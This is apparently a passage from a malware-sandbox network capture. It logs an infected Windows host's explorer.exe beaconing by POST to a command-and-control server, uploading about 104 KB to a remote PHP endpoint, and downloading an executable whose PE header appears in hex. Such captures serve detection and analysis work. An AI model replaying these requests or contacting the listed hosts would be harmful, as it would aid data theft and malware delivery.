                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Accept: */*
                                                                                                                                                        Referer: http://brlvnaq.net/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                        Content-Length: 246
                                                                                                                                                        Host: host-data-coin-11.com
                                                                                                                                                        Dec 28, 2021 03:23:23.605401993 CET11340INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Tue, 28 Dec 2021 02:23:23 GMT
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        45192.168.2.3498185.188.89.4880C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Dec 28, 2021 03:23:24.154761076 CET11341OUTPOST / HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Accept: */*
                                                                                                                                                        Referer: http://chmbugnp.org/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                        Content-Length: 243
                                                                                                                                                        Host: host-data-coin-11.com
                                                                                                                                                        Dec 28, 2021 03:23:24.297678947 CET11342INHTTP/1.1 404 Not Found
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Tue, 28 Dec 2021 02:23:24 GMT
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 36 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 84 42 09 25 16 f9 b5 8f bd b8 15 a5 0c ce 2c b4 59 52 db 04 e5 fd 28 e3 22 58 1b b2 ed cf 00 b5 50 db 41 d4 fd 25 8d 2a ed aa 96 56 2b e3 b1 48 22 e3 b3 b7 6c f6 9e b8 5e a9 77 96 c4 30 41 56 39 0f 4c da bb 4d b3 f2 40 84 a0 c3 00 c6 60 9d d2 69 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: 66I:82OB%,YR("XPA%*V+H"l^w0AV9LM@`i0


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        46192.168.2.3498205.188.89.4880C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Dec 28, 2021 03:23:26.437870979 CET11895OUTPOST / HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Accept: */*
                                                                                                                                                        Referer: http://qnhrcwsu.com/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                        Content-Length: 248
                                                                                                                                                        Host: host-data-coin-11.com
                                                                                                                                                        Dec 28, 2021 03:23:26.576988935 CET11896INHTTP/1.1 404 Not Found
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Tue, 28 Dec 2021 02:23:26 GMT
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        47192.168.2.3498215.188.89.4880C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Dec 28, 2021 03:23:26.717849970 CET11896OUTPOST / HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Accept: */*
                                                                                                                                                        Referer: http://jiwvmdi.com/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                        Content-Length: 205
                                                                                                                                                        Host: host-data-coin-11.com
                                                                                                                                                        Dec 28, 2021 03:23:26.829476118 CET11897INHTTP/1.1 404 Not Found
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Tue, 28 Dec 2021 02:23:26 GMT
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        48192.168.2.3498225.188.89.4880C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Dec 28, 2021 03:23:26.934341908 CET11898OUTPOST / HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Accept: */*
                                                                                                                                                        Referer: http://xippeeyeyr.com/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                        Content-Length: 225
                                                                                                                                                        Host: host-data-coin-11.com
                                                                                                                                                        Dec 28, 2021 03:23:27.051914930 CET11899INHTTP/1.1 404 Not Found
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Tue, 28 Dec 2021 02:23:27 GMT
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 1e 49 3a 44 a6 e8 de ea e4 40 fd 45 91 6e b8 57 5b 91 17 bf ec 31 e5 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: 2cI:82OI:D@EnW[10


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        49192.168.2.3498245.188.89.4880C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Dec 28, 2021 03:23:28.192926884 CET11900OUTPOST /tratata.php HTTP/1.1
                                                                                                                                                        Content-Type: multipart/form-data; boundary=----EKNYUKXBA1NYU3OP
                                                                                                                                                        Host: file-file-host4.com
                                                                                                                                                        Content-Length: 104397
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: PHPSESSID=n6c9ok5pr9f3mq8uid55nirqfv
                                                                                                                                                        Dec 28, 2021 03:23:29.024142981 CET12005INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.2
                                                                                                                                                        Date: Tue, 28 Dec 2021 02:23:28 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        Connection: close
                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                        Pragma: no-cache


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        5192.168.2.34986252.217.141.225443C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        50192.168.2.3498325.188.89.4880C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Dec 28, 2021 03:23:48.241945982 CET12566OUTPOST / HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Accept: */*
                                                                                                                                                        Referer: http://bfseu.org/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                        Content-Length: 274
                                                                                                                                                        Host: host-data-coin-11.com
                                                                                                                                                        Dec 28, 2021 03:23:48.355775118 CET12567INHTTP/1.1 404 Not Found
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Tue, 28 Dec 2021 02:23:48 GMT
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        51192.168.2.3498335.188.89.4880C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Dec 28, 2021 03:23:48.462765932 CET12567OUTPOST / HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Accept: */*
                                                                                                                                                        Referer: http://mrlefqqc.com/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                        Content-Length: 124
                                                                                                                                                        Host: host-data-coin-11.com
                                                                                                                                                        Dec 28, 2021 03:23:48.604079962 CET12568INHTTP/1.1 404 Not Found
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Tue, 28 Dec 2021 02:23:48 GMT
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 4c ee af 88 70 bc 57 dd 42 d0 fc 25 84 26 e8 c3 90 52 2e ee a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: 46I:82OR&:UPJ%9LpWB%&R.c0


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        52192.168.2.3498345.188.89.4880C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Dec 28, 2021 03:23:48.722326994 CET12569OUTGET /files/2264_1640622147_2258.exe HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                        Host: data-host-coin-8.com
                                                                                                                                                        Dec 28, 2021 03:23:48.820271015 CET12570INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Tue, 28 Dec 2021 02:23:48 GMT
                                                                                                                                                        Content-Type: application/x-msdos-program
                                                                                                                                                        Content-Length: 844800
                                                                                                                                                        Connection: close
                                                                                                                                                        Last-Modified: Mon, 27 Dec 2021 16:22:27 GMT
                                                                                                                                                        ETag: "ce400-5d4231c541a6e"
                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 04 b7 bc 92 40 d6 d2 c1 40 d6 d2 c1 40 d6 d2 c1 2f a0 4c c1 51 d6 d2 c1 2f a0 78 c1 2a d6 d2 c1 49 ae 41 c1 43 d6 d2 c1 40 d6 d3 c1 fd d6 d2 c1 2f a0 79 c1 76 d6 d2 c1 2f a0 48 c1 41 d6 d2 c1 2f a0 4f c1 41 d6 d2 c1 52 69 63 68 40 d6 d2 c1 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 92 ed 9f 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 9e 0b 00 00 26 09 00 00 00 00 00 30 ee 09 00 00 10 00 00 00 b0 0b 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 50 48 00 00 04 00 00 92 c0 0d 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 9c 0b 00 28 00 00 00 00 40 14 00 90 62 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 00 28 21 00 00 60 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 a5 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 e4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b0 9d 0b 00 00 10 00 00 00 9e 0b 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 68 6f 08 00 00 b0 0b 00 00 8c 00 00 00 a2 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 68 75 77 75 00 00 00 05 00 00 00 00 20 14 00 00 02 00 00 00 2e 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 73 61 78 00 00 00 00 93 0d 00 00 00 30 14 00 00 0e 00 00 00 30 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 90 b2 33 00 00 40 14 00 00 64 00 00 00 3e 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 bc 40 00 00 00 00 48 00 00 42 00 00 00 a2 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 9f 0b 00 74 9f 0b 00 88 9f 0b 00 9a 9f 0b 00 ac 9f 0b 00 c2 9f 0b 00 d2 9f 0b 00 e8 9f 0b 00 f8 9f 0b 00 14 a0 0b 00 28 a0 0b 00 3c a0 0b 00 52 a0 0b 00 6c
                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$@@@/LQ/x*IAC@/yv/HA/OARich@PEL_&0@PHL(@bH(!`@.text `.dataho@.huwu .@.sax00@.rsrc3@d>@@.reloc@HB@BXt(<Rl


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        53192.168.2.3498365.188.89.4880C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Dec 28, 2021 03:23:50.606484890 CET13447OUTPOST / HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Accept: */*
                                                                                                                                                        Referer: http://yqndvhfvew.org/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                        Content-Length: 341
                                                                                                                                                        Host: host-data-coin-11.com
                                                                                                                                                        Dec 28, 2021 03:23:50.720101118 CET13448INHTTP/1.1 404 Not Found
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Tue, 28 Dec 2021 02:23:50 GMT
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        54192.168.2.3498375.188.89.4880C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Dec 28, 2021 03:23:50.819042921 CET13449OUTPOST / HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Accept: */*
                                                                                                                                                        Referer: http://prmhflof.org/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                        Content-Length: 198
                                                                                                                                                        Host: host-data-coin-11.com
                                                                                                                                                        Dec 28, 2021 03:23:50.935395956 CET13449INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Tue, 28 Dec 2021 02:23:50 GMT
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        55192.168.2.3498385.188.89.4880C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Dec 28, 2021 03:23:51.035043001 CET13450OUTPOST / HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Accept: */*
                                                                                                                                                        Referer: http://risngapv.org/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                        Content-Length: 352
                                                                                                                                                        Host: host-data-coin-11.com
                                                                                                                                                        Dec 28, 2021 03:23:51.154743910 CET13451INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Tue, 28 Dec 2021 02:23:51 GMT
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        56192.168.2.3498395.188.89.4880C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Dec 28, 2021 03:23:51.269444942 CET13452OUTPOST / HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Accept: */*
                                                                                                                                                        Referer: http://ujyivo.org/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                        Content-Length: 116
                                                                                                                                                        Host: host-data-coin-11.com
                                                                                                                                                        Dec 28, 2021 03:23:51.388201952 CET13452INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Tue, 28 Dec 2021 02:23:51 GMT
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        Connection: close
